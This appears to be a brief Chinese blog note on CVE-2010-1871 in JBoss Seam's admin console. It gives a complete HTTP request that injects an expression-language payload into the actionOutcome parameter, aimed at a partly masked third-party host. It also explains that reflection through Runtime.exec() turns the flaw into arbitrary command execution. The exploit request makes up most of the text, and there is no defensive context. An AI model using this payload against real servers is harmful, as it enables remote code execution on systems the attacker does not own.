JBoss ND003 CVE-2010-1871

60 阅读1分钟

payload:

GET /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b8477077*9589989%7d HTTP/1.1
Host: 91.xxxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip

image.png

漏洞利用

此漏洞是通过seam组件中插入#{payload}进行模板注入,可以在以下链接中插入要执行的方法,通过Java反射机制来获取到(Java.lang.Runtime.getRuntime().exec()方法),从而可以传入任何想要执行的命令。

参考

blog.o0o.nu/2010/07/cve…